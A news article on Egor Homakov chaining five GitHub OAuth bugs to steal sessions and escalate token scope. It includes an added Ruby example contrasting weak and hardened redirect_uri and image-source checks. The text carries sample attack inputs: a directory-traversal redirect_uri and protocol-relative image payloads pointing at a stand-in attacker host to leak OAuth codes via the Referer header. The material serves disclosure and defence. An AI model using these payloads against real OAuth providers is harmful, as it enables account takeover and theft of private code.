Handful of OAuth bugs combine for GitHub session theft

Almost two years after pointing out a public key vulnerability to GitHub, security researcher Egor Homakov has focused his attention on the service's OAuth implementation.

Chaining together five low-severity bugs has allowed Russian security researcher Egor Homakov to steal user sessions and escalate the scope of OAuth tokens issued by GitHub, giving him the ability to access and delete private GitHub repositories and Gists.

Detailing the process of linking the five bugs together in a blog post, Homakov called his exploit the "perfect crime".

The first two bugs concerned GitHub's handling of the redirect_uri parameter: the repository hosting service did not validate the redirect_uri a client sent when requesting a token, and it permitted directory traversal sequences inside that parameter.

"It was flawed: no matter what redirect_uri the Client sent to get a token, the Provider responded with valid access_token," Homakov said.

"Without the first bug, the second would be worth nothing as well. But together they turn into a powerful vulnerability — the attacker could hijack the authorization code issued for a 'leaky' redirect_uri, then apply the leaked code on real Client's callback to log in Victim's account."

Thanks to a bug in the URI library of Ruby, the language GitHub is built on, Homakov was able to craft an image reference that bypassed GitHub's filters yet resolved in browsers to a protocol-relative location under the attacker's control, such as <img src="///attackersite.com">.

Combining these three bugs, an attacker could direct an OAuth login to redirect back to a GitHub Gist page containing an image that points at a URL the attacker controls. The victim's browser then sends the OAuth code parameter along with the request for that image (in the Referer header), so the attacker can capture the code, use it to log into the victim's GitHub account and access private gists.
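To make the first three bugs concrete, here is an added illustration in Ruby (the language GitHub is built on); it is not code from Homakov's write-up or from GitHub. It shows a prefix-based redirect_uri check and a "no host means relative" image-source filter of the kind the article describes, each beside a stricter version that rejects the traversal and protocol-relative cases. The hostnames gist.example and attackersite.example, the callback path and the allow-list are constructed placeholders.

```ruby
require "uri"

# Constructed example values; not GitHub's or Gist's real configuration.
REGISTERED_REDIRECT_URI = "https://gist.example/auth/github/callback".freeze
ALLOWED_IMAGE_HOSTS     = %w[gist.example assets.gist.example].freeze

# Weak redirect_uri check of the kind the article describes: any URI that merely
# begins with the registered callback is accepted, so a requested URI such as
# ".../callback/../../../attacker/leak" passes, although the browser collapses
# the "/../" segments and lands on an attacker-chosen page of the same site.
def weak_redirect_uri_allowed?(registered, requested)
  requested.start_with?(registered)
end

# Resolve "." and ".." segments the way a browser does before following the
# redirect, so the strict comparison sees the path the user agent will request.
def normalise_path(path)
  segments = []
  path.split("/").each do |segment|
    case segment
    when "", "." then next
    when ".."    then segments.pop
    else              segments << segment
    end
  end
  "/" + segments.join("/")
end

# Strict check: scheme, host, port and normalised path must all equal the
# registered value; query strings and fragments are refused outright.
def strict_redirect_uri_allowed?(registered, requested)
  reg = URI.parse(registered)
  req = URI.parse(requested)
  return false unless req.scheme == "https" && req.scheme == reg.scheme
  return false unless req.host == reg.host && req.port == reg.port
  return false if req.query || req.fragment
  normalise_path(req.path) == normalise_path(reg.path)
rescue URI::InvalidURIError
  false
end

# Weak image-src filter: whatever the URI parser reports as having no host is
# treated as a same-site relative path. "///attackersite.example" parses with an
# empty host, so it slips through, yet browsers treat it as a network-path
# reference and fetch it from attackersite.example.
def weak_image_src_allowed?(src)
  uri = URI.parse(src)
  return true if uri.host.to_s.empty?
  ALLOWED_IMAGE_HOSTS.include?(uri.host)
rescue URI::InvalidURIError
  false
end

# Hardened filter: refuse network-path references ("//..." with any number of
# leading slashes) and backslashes (which browsers treat as slashes) before
# parsing, then accept only a root-relative path or an explicit https URL on an
# allow-listed host.
def strict_image_src_allowed?(src)
  return false if src.start_with?("//") || src.include?("\\")
  uri = URI.parse(src)
  if uri.scheme.nil? && uri.host.to_s.empty?
    return uri.path.start_with?("/")   # root-relative, same site only
  end
  uri.scheme == "https" && ALLOWED_IMAGE_HOSTS.include?(uri.host)
rescue URI::InvalidURIError
  false
end

if $PROGRAM_NAME == __FILE__
  traversal = "#{REGISTERED_REDIRECT_URI}/../../../attacker/leak"
  puts "weak redirect_uri check:   #{weak_redirect_uri_allowed?(REGISTERED_REDIRECT_URI, traversal)}"
  puts "strict redirect_uri check: #{strict_redirect_uri_allowed?(REGISTERED_REDIRECT_URI, traversal)}"
  puts "weak image filter:         #{weak_image_src_allowed?('///attackersite.example')}"
  puts "strict image filter:       #{strict_image_src_allowed?('///attackersite.example')}"
end
```

The two strict functions share one design choice: decide on the form the browser will act on (the normalised path, the leading slashes of the raw string) rather than on what a server-side parser happens to report, since the bugs in the chain all live in that gap.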

Digging deeper, Homakov decoded the Base64-encoded _gist_session cookie and found that it contained the OAuth access token, allowing him to make API calls as the victim. To gain API access to view and modify private repositories, he then escalated the scope of the stolen Gist token, which was possible because Gist is a pre-approved client on GitHub.

For his troubles, and proper disclosure, GitHub paid Homakov US$4000 under its new security bug bounty program.

GitHub's response to this quintet of bugs differs markedly from its reaction to Homakov's public key disclosure in March 2012. Then, after Homakov publicly demonstrated a bug that allowed him to add his public key to the Rails project and push files to it with timestamps in the future, GitHub temporarily suspended his account for what it viewed as irresponsible disclosure.

Late last month, Homakov found two vulnerabilities in Facebook Connect that the social network said it could not, or would not, fix. The vulnerabilities once again concerned the handling of OAuth's redirect_uri, leading Homakov to warn against using Facebook Connect.

"In my opinion I'd recommend not using Facebook Connect in critical applications (nor with any other OAuth provider)," he said at the time in a blog post.

"If you must use Facebook Connect, I recommend whitelisting your redirect_uri in app's settings and requiring user interaction (clicking some button) to start adding a new connection."